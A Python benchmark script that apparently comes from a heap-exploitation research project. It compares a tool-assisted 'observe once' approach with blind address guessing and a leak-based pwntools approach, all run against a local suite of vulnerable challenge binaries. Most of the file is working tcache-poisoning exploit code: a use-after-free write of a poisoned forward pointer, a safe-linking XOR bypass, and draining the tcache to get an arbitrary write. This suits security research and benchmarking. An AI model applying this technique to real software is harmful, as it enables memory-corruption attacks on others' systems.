heap-trm / bench /observe_once_benchmark.py
amarck's picture
Benchmark results: observe-once fails (stale addresses across processes)
bf8c369
#!/usr/bin/env python3
"""
observe_once_benchmark.py — The right architecture for heaptrm.
Not an iterative tool loop. Instead:
1. Observe heap layout once (heaptrm)
2. Compute exploit from observations (deterministic)
3. Execute exploit script against fresh binary
Compare:
Approach A: observe → compute → exploit (has addresses)
Approach B: guess → exploit (no addresses)
This is the fair test: does one observation call unlock exploitation
that's otherwise impossible?
"""
import subprocess
import json
import struct
import os
import time
from pathlib import Path
from dataclasses import dataclass
ROOT = Path(__file__).parent.parent
SUITE = ROOT / "cve_tests" / "suite"
HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
@dataclass
class Result:
challenge: str
difficulty: str
approach: str
success: bool
info: str
def observe_heap(binary: str, size_class: int) -> dict:
"""One heaptrm call: alloc 3, free 2, observe. Returns addresses."""
commands = [
{"action": "send", "data": f"1 0 {size_class}\n"},
{"action": "send", "data": f"1 1 {size_class}\n"},
{"action": "send", "data": f"1 2 {size_class}\n"},
{"action": "send", "data": "4 0\n"},
{"action": "send", "data": "4 1\n"},
{"action": "observe"},
{"action": "quit"},
]
proc = subprocess.Popen(
[HEAPTRM, binary],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
text=True
)
results = []
for cmd in commands:
proc.stdin.write(json.dumps(cmd) + "\n")
proc.stdin.flush()
line = proc.stdout.readline()
if line:
results.append(json.loads(line))
proc.wait(timeout=5)
# Extract addresses from the observe response
for r in reversed(results):
if r.get("heap") and r["heap"].get("freed", 0) >= 2:
chunks = r["heap"]["chunks"]
freed = [c for c in chunks if c["state"] == "freed"]
allocated = [c for c in chunks if c["state"] == "allocated"]
if freed and allocated:
return {
"freed": [(c["index"], int(c["address"], 16)) for c in freed],
"allocated": [(c["index"], int(c["address"], 16)) for c in allocated],
"all_chunks": chunks,
}
return {}
def exploit_with_observation(binary: str, obs: dict, size_class: int) -> bool:
"""Given observed addresses, compute and execute tcache poison."""
if not obs.get("freed") or not obs.get("allocated"):
return False
# Use the last freed chunk (tcache head) and last allocated chunk (target)
freed_sorted = sorted(obs["freed"], key=lambda x: x[1])
alloc_sorted = sorted(obs["allocated"], key=lambda x: x[1])
chunk1_addr = freed_sorted[-1][1]
target_addr = alloc_sorted[-1][1]
# Safe-linking bypass
xor_key = chunk1_addr >> 12
poisoned_fd = target_addr ^ xor_key
fd_hex = struct.pack("<Q", poisoned_fd).hex()[:16]
# Build exploit: reuse the setup (alloc 3, free 2), then UAF write + drain
commands = (
f"1 0 {size_class}\n"
f"1 1 {size_class}\n"
f"1 2 {size_class}\n"
"4 0\n"
"4 1\n"
f"2 1 {fd_hex}\n" # UAF write poisoned fd
f"1 3 {size_class}\n" # drain tcache — gets freed chunk
f"1 4 {size_class}\n" # drain tcache — gets target!
"2 4 50574e454421210a\n" # write PWNED!! through slot 4
"3 2\n" # read through slot 2
"5\n"
)
proc = subprocess.run(
[binary], input=commands.encode(),
capture_output=True, timeout=5
)
return b"50574e4544" in proc.stdout
def exploit_blind(binary: str, size_class: int) -> bool:
"""No observation. Guess addresses."""
# Guess heap base — but noise makes this fail
guess_base = 0x555555559000
offsets_to_try = [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600,
0x650, 0x700, 0x750, 0x800, 0x850, 0x900]
for offset in offsets_to_try:
chunk1_guess = guess_base + offset + 0x50
target_guess = chunk1_guess + 0x50
xor_key = chunk1_guess >> 12
poisoned = target_guess ^ xor_key
fd_hex = struct.pack("<Q", poisoned).hex()[:16]
commands = (
f"1 0 {size_class}\n"
f"1 1 {size_class}\n"
f"1 2 {size_class}\n"
"4 0\n"
"4 1\n"
f"2 1 {fd_hex}\n"
f"1 3 {size_class}\n"
f"1 4 {size_class}\n"
"2 4 50574e454421210a\n"
"3 2\n"
"5\n"
)
proc = subprocess.run(
[binary], input=commands.encode(),
capture_output=True, timeout=5
)
if b"50574e4544" in proc.stdout:
return True
# Wrong guess corrupts tcache — must restart for each guess
# (each attempt is a fresh process)
return False
def exploit_blind_with_leak(binary: str, size_class: int, config: dict) -> bool:
"""Blind but uses binary's own leak if available."""
from pwn import process as pwn_process, p64, u64, context
context.log_level = "error"
p = pwn_process(binary)
def alloc(slot, sc):
p.sendline(f"1 {slot} {sc}".encode())
return p.recvline(timeout=1).strip()
def free_s(slot):
p.sendline(f"4 {slot}".encode())
return p.recvline(timeout=1).strip()
def edit(slot, hexdata):
p.sendline(f"2 {slot} {hexdata}".encode())
return p.recvline(timeout=1).strip()
def show(slot):
p.sendline(f"3 {slot}".encode())
return p.recvline(timeout=1).strip()
try:
r0 = alloc(0, size_class)
r1 = alloc(1, size_class)
r2 = alloc(2, size_class)
# Try to extract addresses from alloc output
addr0 = addr1 = addr2 = None
for r, idx in [(r0, 0), (r1, 1), (r2, 2)]:
if r and b"0x" in r:
try:
a = int(r.split(b"0x")[1].split()[0], 16)
if idx == 0: addr0 = a
elif idx == 1: addr1 = a
elif idx == 2: addr2 = a
except:
pass
free_s(0)
free_s(1)
# Try UAF read
leak = show(1)
leaked_fd = None
if leak and leak != b"DELETED" and leak != b"ERR" and len(leak) >= 16:
try:
leaked_fd = int(leak[:16], 16)
except:
pass
# Compute exploit based on available info
if addr1 and addr2:
xor_key = addr1 >> 12
poisoned = addr2 ^ xor_key
elif leaked_fd:
guess_key = 0x555555559
decrypted = leaked_fd ^ guess_key
if 0x555555550000 < decrypted < 0x555555570000:
chunk0 = decrypted
target = chunk0 + 0xa0 # guess
poisoned = target ^ guess_key
else:
p.close()
return False
elif addr0:
xor_key = (addr0 + 0x50) >> 12
target = addr0 + 0xa0
poisoned = target ^ xor_key
else:
p.close()
return False
edit(1, p64(poisoned).hex()[:16])
alloc(3, size_class)
alloc(4, size_class)
edit(4, b"PWNED!!".hex())
result = show(2)
p.close()
return result and b"50574e4544" in result
except:
try: p.close()
except: pass
return False
def main():
manifest = json.loads((SUITE / "manifest.json").read_text())
TRIALS = 10
print("=" * 80)
print(f"OBSERVE-ONCE BENCHMARK: heaptrm observe → exploit vs blind")
print(f"{len(manifest)} challenges × {TRIALS} trials")
print("=" * 80)
results = []
for config in manifest:
name = config["name"]
binary = str(SUITE / name)
if not Path(binary).exists():
continue
sizes = config.get("sizes", [0x40])
sc = 1 # default to first size class
# Approach A: observe once with heaptrm, then exploit
ht_wins = 0
for t in range(TRIALS):
obs = observe_heap(binary, sc)
if obs and exploit_with_observation(binary, obs, sc):
ht_wins += 1
# Approach B: blind (uses binary's own leaks if available)
bl_wins = 0
for t in range(TRIALS):
if exploit_blind_with_leak(binary, sc, config):
bl_wins += 1
# Approach C: pure blind guessing (no leak at all)
guess_wins = 0
for t in range(TRIALS):
if exploit_blind(binary, sc):
guess_wins += 1
delta_leak = ht_wins - bl_wins
delta_blind = ht_wins - guess_wins
marker = ">>>" if delta_blind > TRIALS * 0.5 else ">" if delta_blind > 0 else "=="
results.append({
"name": name, "difficulty": config["difficulty"],
"ht": ht_wins, "leak": bl_wins, "blind": guess_wins,
"uaf_read": config["uaf_read"], "addr_leak": config["addr_leak"],
"noise": f"{config['noise_min']}-{config['noise_max']}",
})
print(f" {name} [{config['difficulty']:8s}] "
f"heaptrm={ht_wins}/{TRIALS} "
f"w/leak={bl_wins}/{TRIALS} "
f"blind={guess_wins}/{TRIALS} "
f"| leak={config['addr_leak']:7s} uaf={config['uaf_read']} "
f"noise={config['noise_min']}-{config['noise_max']} {marker}")
# Summary by difficulty
print("\n" + "=" * 80)
print("SUMMARY")
print("=" * 80)
print(f"{'Difficulty':10s} {'heaptrm':>10s} {'w/leak':>10s} {'blind':>10s}")
print("-" * 45)
for diff in ["easy", "medium", "hard", "extreme"]:
group = [r for r in results if r["difficulty"] == diff]
if not group:
continue
ht = sum(r["ht"] for r in group) / (len(group) * TRIALS) * 100
lk = sum(r["leak"] for r in group) / (len(group) * TRIALS) * 100
bl = sum(r["blind"] for r in group) / (len(group) * TRIALS) * 100
print(f"{diff:10s} {ht:9.0f}% {lk:9.0f}% {bl:9.0f}%")
ht_all = sum(r["ht"] for r in results) / (len(results) * TRIALS) * 100
lk_all = sum(r["leak"] for r in results) / (len(results) * TRIALS) * 100
bl_all = sum(r["blind"] for r in results) / (len(results) * TRIALS) * 100
print(f"{'OVERALL':10s} {ht_all:9.0f}% {lk_all:9.0f}% {bl_all:9.0f}%")
# Save
Path("bench").mkdir(exist_ok=True)
with open("bench/observe_once_results.json", "w") as f:
json.dump(results, f, indent=2)
print(f"\nSaved to bench/observe_once_results.json")
if __name__ == "__main__":
main()